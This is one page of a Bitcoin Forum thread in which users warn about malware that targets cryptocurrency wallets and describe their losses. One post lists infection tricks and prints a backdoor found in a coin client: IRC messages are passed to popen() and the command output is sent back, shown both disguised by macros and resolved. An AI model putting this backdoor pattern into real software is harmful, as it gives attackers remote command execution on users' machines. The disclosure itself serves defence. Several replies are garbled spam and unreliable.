Bitcoin Forum
April 18, 2024, 12:30:15 PM *
News: Latest Bitcoin Core release: 26.0 [Torrent]

Home   Help Search Login Register More  
Pages: « 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 [42] 43 44 45 46 »
  Print  
Author Topic: Beware of Increasingly Sophisticated Malware Infection Attempts  (Read 679448 times)
Yaiono

Activity: 15
Merit: 0

View Profile
October 02, 2018, 04:59:17 PM

I base extremely worthy data hither representing myself. Instantly I recognise how to keep safe myself from afflicted -wishers. I thank the initiator of this theme and each those who join in in the talk and plam worthy data .
Advertised sites are not endorsed by the Bitcoin Forum. They may be unsafe, untrustworthy, or illegal in your jurisdiction.

View Profile Personal Message (Offline)

Ignore
Reply with quote  #2

Report to moderator
oneglance

Activity: 4

View Profile
October 04, 2018, 08:22:05 AM

I have experienced this such issue before. I have since quit utilizing bitcoin center as a wallet and not had a wallet that you have to download to your PC to utilize it since I think that its irritating to need to download the blockchain each time you sign into the program. Also it eats up alot of my data transmission that I am by all accounts coming up short on when the month's end approaches.
JayCue

Activity: 854
Merit: 100

View Profile WWW
October 04, 2018, 02:31:02 PM

I was one of the victims of this malware 'scams' who took all my Minexcoin. My anti-virus didn't alert me of any suspicious activity on my pc until I open my wallet with a zero balance. I just wish I did stake my MNX on the minex bank.  Cry

⌐      ERC-20 Token to pay Goods and Services      ¬
▬▬▬▬    ██ █▌█ ▌ b y z b i t ▐ █▐█ ██    ▬▬▬▬
└   Whitepaper   Telegram   Medium   Twitter   Facebook   Linkedin   ┘
⌐      ERC-20 Token to pay Goods and Services      ¬
▬▬▬▬    ██ █▌█ ▌ b y z b i t ▐ █▐█ ██    ▬▬▬▬
└   Whitepaper   Telegram   Medium   Twitter   Facebook   Linkedin   ┘
Myno

Activity: 22

View Profile
October 06, 2018, 04:36:11 PM

Basic , thanks representing your distribution . This data is extremely significant representing each fellow of this assembly . That's a extremely devil-may-care conflict , reason should anyone achieve that. We have to be deliberate of malware assails and have to study many almost how to keep off them.
Wylokel

Activity: 33

View Profile
October 14, 2018, 07:25:56 PM

Any actions have to be entranced which are great sufficiency to keep safe your organizations to be hacked much as not to apply unnamed exe, apply of unix which look as if to be fewer vunarable to virus.
Who I

Activity: 420
Merit: 111

View Profile
October 27, 2018, 02:48:15 PM

Beware of various sites that are advertised all over the Internet. I once accidentally went to such a site and my computer began to attack bitcoin mining viruses. 3 days I was attacked by them
intsol

Activity: 3

View Profile
October 28, 2018, 11:40:23 AM

Yes, attacks are getting more sophisticated.
There are also .SCR "screenshot" downloads being circulated in Telegram groups.
These are actually malware Screensaver EXE's which are able to scrape private keys.

Take Care out there

intsol
SandraStark

Activity: 504
Merit: 107

View Profile
November 01, 2018, 11:56:30 PM

Thank you very much for the information! I didn't even know about such a infection ... I always try to sidestep various unfamiliar programs ... But for example, more and more conditions are encountered in bounty campaigns - download the wallet ...This is often alarming. Especially if the project does not inspire confidence, even after reading the white paper. Recently I found out that telegrams actively distribute links in chat rooms on behalf of well-known projects whose files contain a virus ... When you open a file, it loads, it is not just viewed in the chat.

weblife

Activity: 28

View Profile WWW
November 24, 2018, 02:08:03 AM

In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
here is the source code with macros resolved:
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.
OMG thank you for warning this kind of "hacking"

Hermelda

Activity: 42

View Profile
November 29, 2018, 05:50:08 AM

The malware and cryptoware threat is absolutely there. The first thing you should do is regularly make a backup of your files.
Besides that I recommend Malwarebytes or Heimdal Security Pro software together with your antivirus program. Those two will actively ... uhh, how do you say it in English? Scan or real-time check your status.
When you are the unlucky one who’s Dropbox is encrypted by Cryptoware.. Dropbox can put back a backup until 30 days I believe. Don’t wait to long contacting them.
levitacrossfirevlt

Activity: 88
Merit: 2

View Profile
November 30, 2018, 12:40:43 PM

I am happy that there are good people, who on seeing this tries to alert people why nowadays, it is very difficult to combat this programs a simple page can damage your computer, thank you, I will check my computer
jabrix

Activity: 397
Merit: 10

View Profile
March 11, 2019, 04:06:43 AM

Beware of various sites that are advertised all over the Internet. I once accidentally went to such a site and my computer began to attack bitcoin mining viruses. 3 days I was attacked by them
It's better to keep from attacking bad viruses, because they steal data or something valuable that is on the computer or site that we have. They are very sophisticated.
Various ways that are often used are they come in when we are browsing on the internet, and infect computers for the purpose they want. Therefore computers must be observed frequently to ensure that no viruses enter. Besides using anti-virus that is quite reliable.

●   TOKPIE   ●
 ❰❰❰❰❰❰  GET ETHEREUM FOR YOUR BOUNTY STAKES  ❱❱❱❱❱❱  
● ▬▬▬▬▬ ● ▬▬▬▬▬ ●●●    ●  instantly & regularly  ●    ●●● ▬▬▬▬▬ ● ▬▬▬▬▬ ●
chan-lee

Activity: 9

View Profile
March 22, 2019, 04:45:45 PM

Thanks this was very informative. I guess this forum is a big target for malware developers who want to steal easy crypto money.
Yeah, I think so, too.
So we need to be careful virus.
Virus will catch our chrome cookie, so they can have our account info.
As that account, they attack master's laptop or use it for attacking other site as fake identity.
Mrsparks

Activity: 406
Merit: 5

I-CHAIN - The Revolution of Digital Advertising

View Profile WWW
March 23, 2019, 08:35:10 AM

Sometimes I wonder why humans are so malicious? I have taken note of this cited examples above but please do well to update us on any further threats available on this forum.. So we all can stay safe..

[     I C A      |      icacoin.com      |      IEO is live on Sept 2019     ]
━ ━━━   The Revolution of Digital Advertising   ━━━ ━
chan-lee

Activity: 9

View Profile
March 24, 2019, 03:54:04 PM

Sometimes I wonder why humans are so malicious? I have taken note of this cited examples above but please do well to update us on any further threats available on this forum.. So we all can stay safe..
Roll Eyes
Well.
But you can have solution.
For all web account,especially like binance and bitmex, and paypal account, you need to be enable 2FA verify.
So hacker cant access easily to your account.
 Wink Wink Wink
Dinmazsae

Activity: 308
Merit: 10

View Profile
April 14, 2019, 12:44:42 PM

The number of cases of cyber crime by using malware cannot be tolerated. A solution is needed to handle the case.
Malware is a term used for malicious software designed to damage or carry out unwanted actions on a computer system or what we call viruses.
Computer viruses often spread through e-mail message attachments or instant messages. Therefore, you may not open e-mail attachments unless you know who sent the message or unless you were expecting e-mail attachments. Viruses can masquerade as attachments to funny pictures, greeting cards, or audio and video files. Viruses can hide in pirated software or other files that you download.
tunapa

Activity: 667
Merit: 1

View Profile
April 20, 2019, 03:20:59 AM

this is really not a good thing, this forum is meant to offer help and provide solutions to any issues or problems that anyone might be facing in the crypto currency community. now some people have decided to be manipulative and cause more harm by creating more problems and infecting peoples computers with malwares that seem to be a help to download wallet links. thanks for bringing this up. we all need to be more careful and do things with extra care especially now that there are too many bad people.
jigawagawa

Activity: 61

View Profile
April 26, 2019, 03:29:55 PM
Last edit: April 26, 2019, 08:03:29 PM by jigawagawa

These malware's are very common on Telegram Telegram especially, just last week I fell for one and got every file on my phone wiped off, it was a very painful experience for me. I learnt my lesson though, it's just sad I had to learn the hard way. This post has gone a step further in preventing more people from falling.
Kafanchanchan

Activity: 55

View Profile
April 26, 2019, 03:32:00 PM
Last edit: April 26, 2019, 08:46:35 PM by Kafanchanchan

Yeah, one comes across these malware's easily on Telegram and other similar platform, just be careful and look well before clicking on any link thrown at you on those platform. Most times they are out to cause harm
Odetolala

Activity: 48

View Profile
April 26, 2019, 03:34:29 PM
Last edit: April 26, 2019, 10:37:48 PM by Odetolala

2FA does the magic for me, just that most times after battling with those malwares I end up losing very vital files, that will go a long way in hurting me to bits. So the best option still remains to stay safe, watch on links you click and the places you go on the internet
Pages: « 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 [42] 43 44 45 46 »
  Print  

Jump to: